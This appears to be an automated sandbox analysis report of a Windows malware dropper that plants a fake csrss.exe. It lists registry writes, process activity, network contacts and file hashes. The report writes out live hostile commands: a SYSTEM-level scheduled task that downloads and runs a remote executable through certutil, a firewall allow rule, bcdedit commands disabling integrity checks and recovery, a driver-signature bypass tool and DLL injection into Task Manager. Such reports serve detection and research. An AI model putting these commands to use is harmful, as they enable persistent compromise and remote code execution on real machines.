Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e4030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2592 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe C:\Windows\system32\cmd.exe
PID 2592 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe C:\Windows\system32\cmd.exe
PID 2592 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe C:\Windows\system32\cmd.exe
PID 2592 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe C:\Windows\system32\cmd.exe
PID 1680 wrote to memory of 2856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1680 wrote to memory of 2856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1680 wrote to memory of 2856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2592 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe C:\Windows\rss\csrss.exe
PID 2592 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe C:\Windows\rss\csrss.exe
PID 2592 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe C:\Windows\rss\csrss.exe
PID 2592 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe C:\Windows\rss\csrss.exe
PID 1920 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 688 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1920 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe C:\Windows\system32\bcdedit.exe
PID 1936 wrote to memory of 2120 N/A C:\Windows\rss\csrss.exe C:\Windows\system32\bcdedit.exe
PID 1936 wrote to memory of 2120 N/A C:\Windows\rss\csrss.exe C:\Windows\system32\bcdedit.exe
PID 1936 wrote to memory of 2120 N/A C:\Windows\rss\csrss.exe C:\Windows\system32\bcdedit.exe
PID 1936 wrote to memory of 2120 N/A C:\Windows\rss\csrss.exe C:\Windows\system32\bcdedit.exe
PID 1936 wrote to memory of 2952 N/A C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
PID 1936 wrote to memory of 2952 N/A C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
PID 1936 wrote to memory of 2952 N/A C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
PID 1936 wrote to memory of 2952 N/A C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
PID 1936 wrote to memory of 892 N/A C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
PID 1936 wrote to memory of 892 N/A C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
PID 1936 wrote to memory of 892 N/A C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
PID 1936 wrote to memory of 892 N/A C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe

"C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240116092854.log C:\Windows\Logs\CBS\CbsPersist_20240116092854.cab

C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe

"C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe ""

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

Network

Country Destination Domain Proto
US 8.8.8.8:53 ninhaine.com udp
US 8.8.8.8:53 2makestorage.com udp
US 8.8.8.8:53 nisdably.com udp
US 8.8.8.8:53 4d2c883e-99e3-4deb-8b12-e35e76a80f45.ninhaine.com udp
US 8.8.8.8:53 server2.ninhaine.com udp
CZ 46.8.8.100:443 server2.ninhaine.com tcp
CZ 46.8.8.100:443 server2.ninhaine.com tcp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.184:80 apps.identrust.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 ww82.ninhaine.com udp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
US 8.8.8.8:53 vsblobprodscussu5shard58.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard58.blob.core.windows.net tcp
CZ 46.8.8.100:443 server2.ninhaine.com tcp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 8.8.8.8:53 spolaect.info udp
CZ 46.8.8.100:443 server2.ninhaine.com tcp
CZ 46.8.8.100:443 server2.ninhaine.com tcp
US 199.59.243.225:80 ww82.ninhaine.com tcp

Files

memory/2060-0-0x00000000026E0000-0x0000000002B1C000-memory.dmp

memory/2060-1-0x00000000026E0000-0x0000000002B1C000-memory.dmp

memory/2060-2-0x0000000002B20000-0x0000000003446000-memory.dmp

memory/2060-3-0x0000000000400000-0x0000000000D41000-memory.dmp

memory/2060-4-0x0000000000400000-0x0000000000D41000-memory.dmp

memory/2592-5-0x0000000002600000-0x0000000002A3C000-memory.dmp

memory/2060-6-0x00000000026E0000-0x0000000002B1C000-memory.dmp

memory/2060-7-0x0000000002B20000-0x0000000003446000-memory.dmp

memory/2592-8-0x0000000002600000-0x0000000002A3C000-memory.dmp

memory/2592-9-0x0000000002A40000-0x0000000003366000-memory.dmp

memory/2592-10-0x0000000000400000-0x0000000000D41000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 f09d2cdcdbe7cdc1e725c6a90adc70ac
SHA1 9bef72d6a361242bb340f405a7460fa5a1c0fc14
SHA256 ebef8f61fcd12ea156cfa445b4e02ba09b51064e5cbe9a95a4fce07876caa596
SHA512 8da2f10dff4a23e19cd57ce4a4dae4da431c497543c5ac02264dca5fb9015a5528f2a7332366a05bbf6027dc2fca46afa76590d427e03517f2b46d11d9a7ae58

memory/2592-19-0x0000000000400000-0x0000000000D41000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 03f77ca3cd2d7cd45e1b4516cdf297b1
SHA1 23214578ffe641d08095a7bc943e9b254020f836
